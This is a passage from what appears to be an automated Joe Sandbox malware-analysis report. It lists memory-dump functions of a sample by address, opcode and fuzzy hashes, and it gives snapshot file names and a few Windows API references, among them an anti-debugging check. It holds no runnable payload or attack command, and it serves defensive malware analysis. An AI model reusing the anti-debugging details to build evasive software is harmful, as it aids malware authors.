                                                                                                                                      • Opcode ID: 68179da7aa1c5329016b76290f530150c2d5edf0906b80c1ace183cefc253bcc
                                                                                                                                      • Instruction ID: c8020cda33500888cc26aa55ebbf880827cc4ad606cffef59dedda6ce254e658
                                                                                                                                      • Opcode Fuzzy Hash: 68179da7aa1c5329016b76290f530150c2d5edf0906b80c1ace183cefc253bcc
                                                                                                                                      • Instruction Fuzzy Hash: 4F21D0B0D446098FCB04DFA8C9885EEBFF0BF09204F10556AD845F3264EB315A99CBA5
                                                                                                                                      Function 063B8BD0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 98136982113735765df3e6492d5e10d40ac534fd87b63f3a663cc596e18ed2a0
                                                                                                                                      • Instruction ID: e3ae872f3b8cd65c3791a0b53cc7e65c4269a45d32926a9101f2d9bb8d827adf
                                                                                                                                      • Opcode Fuzzy Hash: 98136982113735765df3e6492d5e10d40ac534fd87b63f3a663cc596e18ed2a0
                                                                                                                                      • Instruction Fuzzy Hash: 5A1156768003499FDB10DF9AC845BDEBBF4EB48320F148419EA18A7650C339A950DFA5
                                                                                                                                      Function 063B9361 Relevance: .1, Instructions: 54COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e296b1c760286662b34a6ddb6f3100957aa0649199bfb7e62915077308e53416
                                                                                                                                      • Instruction ID: 1ccac9538bd3302d647f822e4f252da2e62c3ac9fd4ce52eb1cef1de759df7c2
                                                                                                                                      • Opcode Fuzzy Hash: e296b1c760286662b34a6ddb6f3100957aa0649199bfb7e62915077308e53416
                                                                                                                                      • Instruction Fuzzy Hash: D31176B6800209DFDB10DF9AC945BDEBFF5EF48320F248419E618A7250C339A551DFA0
                                                                                                                                      Function 063B88A4 Relevance: .1, Instructions: 54COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687664779.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_63b0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 73fc3d2357291078e16b9ce7aa918c138ed95f6e4701e2c2cd798666e853066a
                                                                                                                                      • Instruction ID: 429d888f4263ce2e12d07ec2574e7d375f5c673fbdfabac95104034516e5f88c
                                                                                                                                      • Opcode Fuzzy Hash: 73fc3d2357291078e16b9ce7aa918c138ed95f6e4701e2c2cd798666e853066a
                                                                                                                                      • Instruction Fuzzy Hash: 3A11E838E402498FEB40DFE8D850BDEBBF5AF88315F409065E908E7749E6319D418B95
                                                                                                                                      Function 020BD057 Relevance: .1, Instructions: 53COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679845153.00000000020BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 020BD000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_20bd000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 04350605a9db7d138f2fbe48ca01c73726ab69fdae8acd1ee8d1c9fc5ffa3134
                                                                                                                                      • Instruction ID: 3c95295669059e1ef0280acc386d3bdc2a156ae2680a5a76068fec1b523a8f4c
                                                                                                                                      • Opcode Fuzzy Hash: 04350605a9db7d138f2fbe48ca01c73726ab69fdae8acd1ee8d1c9fc5ffa3134
                                                                                                                                      • Instruction Fuzzy Hash: 5011BE75504280DFCB16CF14D5C0B55FBB1FB48324F24C6A9D8494B256C33AD44ACB61
                                                                                                                                      Function 021663A7 Relevance: .0, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 374d9dd7aad5249409427ba62509c4d20cbba83a9aca2c9b4995ef1e9b6a980e
                                                                                                                                      • Instruction ID: 1b2d24104df3ee38f8611f566453711922b241388206d188591b0a1e86ffca8a
                                                                                                                                      • Opcode Fuzzy Hash: 374d9dd7aad5249409427ba62509c4d20cbba83a9aca2c9b4995ef1e9b6a980e
                                                                                                                                      • Instruction Fuzzy Hash: 68012832B401156FCB159E5898086FF3BEBEBCC350F14842AF915D7250DB35D822DB94
                                                                                                                                      Function 0216F872 Relevance: .0, Instructions: 50COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1f372465d16ad8b951db57186622e10e2b878acc93ef545fd547135286f4b1d9
                                                                                                                                      • Instruction ID: 5e97327e9ff2a5cc6eb1c8f3fea326c0ab6245692d194f3ba5453f7836eee528
                                                                                                                                      • Opcode Fuzzy Hash: 1f372465d16ad8b951db57186622e10e2b878acc93ef545fd547135286f4b1d9
                                                                                                                                      • Instruction Fuzzy Hash: 56015EB0C49208DFCB15DFB9E4042BDBBF9EB4A300F2090EAD40AA3651E7344A55CB95
                                                                                                                                      Function 0053D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679392607.000000000053D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0053D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_53d000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 08efac56a8b22e9561b3b4357650ab88de0ce49a7057eb96e4dbb34eb3548523
                                                                                                                                      • Instruction ID: 448886e3801a70a1a59eafe9d552de91f5ff5978a92bb4cb332aaf2f0bcde3a1
                                                                                                                                      • Opcode Fuzzy Hash: 08efac56a8b22e9561b3b4357650ab88de0ce49a7057eb96e4dbb34eb3548523
                                                                                                                                      • Instruction Fuzzy Hash: A001F7315043409AE7244A21EC88B66BFB8EF41B25F18C559EC580F182D2799C46CAB1
                                                                                                                                      Function 0053D006 Relevance: .0, Instructions: 45COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3679392607.000000000053D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0053D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_53d000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1c002e6efac119583af2106579961e7f0b1fdbcca945f84b4342124a47b8ad33
                                                                                                                                      • Instruction ID: 04672a37c4b22a9289a8a909500db215bf4913be042211885748971bbd46156f
                                                                                                                                      • Opcode Fuzzy Hash: 1c002e6efac119583af2106579961e7f0b1fdbcca945f84b4342124a47b8ad33
                                                                                                                                      • Instruction Fuzzy Hash: 59014C6100E3C09ED7178B259C98B52BFB8EF53624F1981DBD8888F1A3C2699C49C772
                                                                                                                                      Function 0216EE40 Relevance: .0, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 16be67e6d92a845f095a3fe4c5f6286efb39a12719f3e8f012ce22304c5c2582
                                                                                                                                      • Instruction ID: bcc110f7510b04502f6d851b97027123040bdae9aee9a7bf1e073a5071dbcf69
                                                                                                                                      • Opcode Fuzzy Hash: 16be67e6d92a845f095a3fe4c5f6286efb39a12719f3e8f012ce22304c5c2582
                                                                                                                                      • Instruction Fuzzy Hash: 7A113974D40209EFCB00DFA8D444EAEBBB1EB89300F508425D515A3364E7306A16DF81
                                                                                                                                      Function 0641F231 Relevance: .0, Instructions: 44COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 81e1ecb5a39934053afa30a501d28d63214168972ab91270efc6be0cbe44b4a6
                                                                                                                                      • Instruction ID: 6ff63545025ffe568fa11f0f1134701934569831502bc7d4dc40edd2105affd6
                                                                                                                                      • Opcode Fuzzy Hash: 81e1ecb5a39934053afa30a501d28d63214168972ab91270efc6be0cbe44b4a6
                                                                                                                                      • Instruction Fuzzy Hash: 60012C7AE102248FD790EFBCD40899A7BF4EF4C226711456AE805DB310EB32DD068B91
                                                                                                                                      Function 02166C47 Relevance: .0, Instructions: 41COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e46b9e515bc07394f1dd64107d60e690ed970404c2b091d8cf871f56181ed7d7
                                                                                                                                      • Instruction ID: d1c37b27d2cd12dede862ac0e4d5f4d51238007e5a9e39dbdc3d8579483ff4c3
                                                                                                                                      • Opcode Fuzzy Hash: e46b9e515bc07394f1dd64107d60e690ed970404c2b091d8cf871f56181ed7d7
                                                                                                                                      • Instruction Fuzzy Hash: 53F04C383456494BE705EB68E8587757B7AEFC0108F04C425D8098B50AEBA69817C760
                                                                                                                                      Function 0641ECD0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2aa95a929873399a9c8b03f65c4aa92556e0415a6bccae4797aeb749497e2de7
                                                                                                                                      • Instruction ID: ae708cfdfc3263f0046f61879f4f244bd9786dea99dcf1d67de4dfd3a77694b5
                                                                                                                                      • Opcode Fuzzy Hash: 2aa95a929873399a9c8b03f65c4aa92556e0415a6bccae4797aeb749497e2de7
                                                                                                                                      • Instruction Fuzzy Hash: 48F090383052418FE7559B3AE858DBB3BAAEFC671471540EAF405CF2A2DA61DC03CB90
                                                                                                                                      Function 0641F198 Relevance: .0, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7bc4328b8c9b9346826c45043adfc124a077300668572eb961eedca2b5b844c8
                                                                                                                                      • Instruction ID: 4a889ecd456d1b77c2ab977c3faa1d32067d1c8a961445b8c0bab9abc288566e
                                                                                                                                      • Opcode Fuzzy Hash: 7bc4328b8c9b9346826c45043adfc124a077300668572eb961eedca2b5b844c8
                                                                                                                                      • Instruction Fuzzy Hash: 1F01B670E402199FCB94EFB9D8046EEBBF5BF48201F14856AD419F7250EB3959068FD4
                                                                                                                                      Function 0641ECE0 Relevance: .0, Instructions: 33COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0fe3676f117ef05cd985005f3663a5776410d4937fb5db1853b4a8db1ccc663b
                                                                                                                                      • Instruction ID: 13f3566cf57d071661ae64c59f3257b0a54e50fd8deed93d49d22b9a52a0dd95
                                                                                                                                      • Opcode Fuzzy Hash: 0fe3676f117ef05cd985005f3663a5776410d4937fb5db1853b4a8db1ccc663b
                                                                                                                                      • Instruction Fuzzy Hash: EBF082343401058FE708AF2AE85893A37AAEFC5711B04446AF906CF361DE60EC028BD0
                                                                                                                                      Function 02162DB8 Relevance: .0, Instructions: 25COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6bc9a968e6eb922f1589973fdf38a2d012918a99dde9e03a1bfadfd2734f1b5b
                                                                                                                                      • Instruction ID: 579c036ebf8ac08e40b494e82357da91528ffca688d158b06c962eeb6d9adb79
                                                                                                                                      • Opcode Fuzzy Hash: 6bc9a968e6eb922f1589973fdf38a2d012918a99dde9e03a1bfadfd2734f1b5b
                                                                                                                                      • Instruction Fuzzy Hash: F3E0D831D1135547CB069760D8141DDBB35EE92211F418666C4507B240EA216A1AC3E1
                                                                                                                                      Function 0641F220 Relevance: .0, Instructions: 24COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687882365.0000000006410000.00000040.00000800.00020000.00000000.sdmp, Offset: 06410000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6410000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ee88f12bc79ebeb23df6fd945297b48ccd3fa8231ac8fe930c5b2baa265f1da4
                                                                                                                                      • Instruction ID: e0b2d3d563a530523b84d27e73c4c55fc673c4f39c025096fa353ca9e79cac3d
                                                                                                                                      • Opcode Fuzzy Hash: ee88f12bc79ebeb23df6fd945297b48ccd3fa8231ac8fe930c5b2baa265f1da4
                                                                                                                                      • Instruction Fuzzy Hash: BEE0483BA105649F8B51DB68E4148D93794EB482753050395ED25DB355D721C80987E4
                                                                                                                                      Function 02162DC8 Relevance: .0, Instructions: 19COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2bcc3d66a2979d039f7bf3d7df699601040d4a2ad49f41b015805debbf8dc107
                                                                                                                                      • Instruction ID: 57fcb7b713a7cc3cda5ba3b18cc872e01c18247b14ea8750140405754ef26a03
                                                                                                                                      • Opcode Fuzzy Hash: 2bcc3d66a2979d039f7bf3d7df699601040d4a2ad49f41b015805debbf8dc107
                                                                                                                                      • Instruction Fuzzy Hash: 84D02B31D2032A43CB00E7A5DC044EFFB38EEC1322B918322D41033000FB312658C2E1
                                                                                                                                      Function 02169410 Relevance: .0, Instructions: 18COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                      • Instruction ID: 4b0022b225a2499ac272e6b17bbcffb9db1a238e4d99540da70c7a7bff8709d2
                                                                                                                                      • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                      • Instruction Fuzzy Hash: 67C08C3328C1282BA228108FBD48EBBBB8CD3C12B4A220177F52CC320099539C9081F4
                                                                                                                                      Function 0216B4BD Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9efd4ab5026144516e510175778e2b2178cc3a75f024c049d8c9fabbc520521a
                                                                                                                                      • Instruction ID: 1bd31ce79842e8b5ce907ad02b4dc2b3e61be0658981d64bc931f3241a490db2
                                                                                                                                      • Opcode Fuzzy Hash: 9efd4ab5026144516e510175778e2b2178cc3a75f024c049d8c9fabbc520521a
                                                                                                                                      • Instruction Fuzzy Hash: EFD0673AB410089FCB049F98E8449DDF7B6FB9C221B458516E915A3260C6319965DBA4
                                                                                                                                      Function 0216DC1F Relevance: .0, Instructions: 16COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c25a3fe1708e2437f57b80e3343f8adebf26f1e6c1bdadb9b9d9014359e38435
                                                                                                                                      • Instruction ID: 4ac860c81adbd1304abdfed19070942a8fab7d4c0013402a34e9c50a9857d12e
                                                                                                                                      • Opcode Fuzzy Hash: c25a3fe1708e2437f57b80e3343f8adebf26f1e6c1bdadb9b9d9014359e38435
                                                                                                                                      • Instruction Fuzzy Hash: 81D04235E4410DCBCB30DFA8E4489DCBBB0EB88212B10546BD565A7211DA3059698F15
                                                                                                                                      Function 02166C58 Relevance: .0, Instructions: 12COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b8c7d604f1ee1232645775238e56da2ca83d78fb2bcf1701fcc9041a5a1f80e0
                                                                                                                                      • Instruction ID: 8baf23a953df6236eb8a7819680bbf75c014ee440ffc6ac3c9c5b9c221e77df3
                                                                                                                                      • Opcode Fuzzy Hash: b8c7d604f1ee1232645775238e56da2ca83d78fb2bcf1701fcc9041a5a1f80e0
                                                                                                                                      • Instruction Fuzzy Hash: 74C01238A0431A4BD701FB75E949515373BA6C0105B449911E4090A94DDEF4694A56A6

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 0040CE09 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2579439406-0
                                                                                                                                      • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                                                                      • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                                                                      • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                                                                      Function 00408C60 Relevance: 4.1, Strings: 3, Instructions: 377COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: @$@$PA
                                                                                                                                      • API String ID: 0-3039612711
                                                                                                                                      • Opcode ID: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                      • Instruction ID: 284407f43597d2b1529aa5dbb826e4f49811f0ea4eaa41d9cabafce47d44ff82
                                                                                                                                      • Opcode Fuzzy Hash: 524773d1bc2011db47f0014430bcd25baf081f96639b8f8b2c6f9a821cea509b
                                                                                                                                      • Instruction Fuzzy Hash: 64E159316083418FC724DF28C58066BB7E1AFD9314F14493EE8C5A7391EB79D949CB8A
                                                                                                                                      Function 0040ADB0 Relevance: 2.5, APIs: 2, Instructions: 23memoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
